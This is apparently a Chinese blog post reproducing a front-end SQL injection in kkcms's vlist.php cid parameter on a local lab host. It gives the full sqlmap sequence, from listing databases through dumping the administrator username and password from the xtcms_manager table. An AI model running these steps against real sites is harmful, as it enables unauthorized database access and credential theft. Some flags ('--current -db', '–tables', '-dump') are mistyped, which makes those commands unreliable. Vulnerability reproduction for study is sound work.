kkcms前台sql注入漏洞复现
目录
安装kkcms
漏洞复现
安装kkcms
下载kkcms地址:
//
浏览器访问主机ip/kkcms-master/install
按照提示傻瓜式安装,中间填一下数据库名和数据库账号密码。
漏洞复现
寻找漏洞点,浏览器访问主机ip/kkcms-master/vlist.php?cid=1。我这里是把文件名kkcms-master改成kkcms才这么搜,默认文件名是kkcms-master,你也可以跟着我这样子改,按照实际情况来。
访问后,有回显。
在URL后面加一个单引号,没有回显
用sqlmap来跑网站数据库的数据。获取数据库所有库的名称:sqlmap.py -u "http://192.168.1.36/kkcms/vlist.php?cid=1" --dbs
获取当前使用的数据库名称sqlmap.py -u "http://192.168.1.36/kkcms/vlist.php?cid=1" --current -db。跑出来了当前使用的数据库名称是kkcms。
获取kkcms库下的表sqlmap.py -u "http://192.168.1.36/kkcms/vlist.php?cid=1" -D "kkcms" –tables。跑出来了有21个表。
获取xtcms_manager 表中的字段sqlmap.py -u "http://192.168.1.36/kkcms/vlist.php?cid=1" -D "kkcms" -T "xtcms_manager" --columns
查看m_name和m_password字段下的数据sqlmap.py -u "http://192.168.1.36/kkcms/vlist.php?cid=1" -D "kkcms" -T "xtcms_manager" -C "m_name,m_password" -dump。跑出来了网站管理员的用户名和密码。智能得很,还解密了。这是默认的后台登陆账号密码。
想看看其他表里的数据也可以,不过新建的大多都是没有数据,而有数据的也没什么价值,所以选择了xtcms_manager 这个表。
完
如果觉得《kkcms前台sql注入漏洞复现》对你有帮助,请点赞、收藏,并留下你的观点哦!